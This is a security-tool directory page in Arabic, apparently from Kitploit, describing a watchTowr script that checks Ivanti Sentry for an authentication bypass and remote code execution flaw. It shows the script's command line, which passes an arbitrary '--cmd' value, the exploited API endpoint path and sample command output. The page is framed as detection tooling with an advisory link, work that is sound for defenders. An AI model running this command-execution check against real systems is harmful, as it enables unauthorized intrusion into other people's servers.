Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
watchTowr-vs-Ivanti-Sentry-RCE-CVE-2026-10520-CVE-2026-10523 | Kitploit
أدوات/GitHubGitHub/watchtowrlabs/watchtowr-vs-ivanti-sentry-rce-cve-2026-10520-cve-2026-10523
ماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالمصادقةالفريق الأحمر
GitHubwatchtowrlabs/watchtowr-vs-ivanti-sentry-rce-cve-2026-10520-cve-2026-10523

watchTowr-vs-Ivanti-Sentry-RCE-CVE-2026-10520-CVE-2026-10523

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
144منذ 2 أشهرلم تتم المراجعة بعد

CVE-2026-10520 و CVE-2026-10523

أداة لتوليد مؤشرات الكشف عن ثغرة تجاوز المصادقة وتنفيذ الأكواد عن بُعد في Ivanti Sentry.

راجع منشورنا على المدونة للاطلاع على التفاصيل التقنية.

الكشف أثناء العمل

root@kitploit:~
$ python3 watchTowr-vs-Ivanti-Sentry-RCE-CVE-2026-10520-CVE-2026-10523.py --url https://127.0.0.1 --cmd "uname -a"
                         __         ___  ___________                   
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________ 
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|   
                                  \/          \/     \/                            

        watchTowr-vs-Ivanti-Sentry-RCE-CVE-2026-10520-CVE-2026-10523.py

        (*) Ivanti Sentry Authentication Bypass and Remote Code Execution Detection Artifact Generator Tool

          - Sonny , watchTowr ([email protected])

        CVEs: [CVE-2026-10520, CVE-2026-10523]

============================================================
Target: https://127.0.0.1
Command: uname -a

[+] Sending command execution check to: https://127.0.0.1/mics/api/v2/sentry/mics-config/handleMessage
[+] Target appears to be vulnerable.

Command output:
Linux 127.0.0.1 4.18.0-553.84.1.el8_10.x86_64 #1 SMP Mon Nov 17 12:53:24 PST 2025 x86_64 x86_64 x86_64 GNU/Linux

الاستخدام

root@kitploit:~
python3 watchTowr-vs-Ivanti-Sentry-RCE-CVE-2026-10520-CVE-2026-10523.py --url https://127.0.0.1 --cmd "uname -a"

الوصف

يتحقق مولّد مؤشرات الكشف (Detection Artefact Generator) من watchTowr هذا من ثغرات Ivanti Sentry المتعلقة بتجاوز المصادقة وتنفيذ الأكواد عن بُعد، وهي CVE-2026-10520 و CVE-2026-10523.

تجدون تفاصيل المعالجة والمزيد من المعلومات في نشرة Ivanti الاستشارية: https://hub.ivanti.com/s/article/Security-Advisory-Ivanti-Sentry-CVE-2026-10520-CVE-2026-10523

تابعوا مختبرات watchTowr

لأحدث الأبحاث الأمنية، تابعوا فريق مختبرات watchTowr.

  • https://labs.watchtowr.com/
  • https://x.com/watchtowrcyber
تنزيل الأداة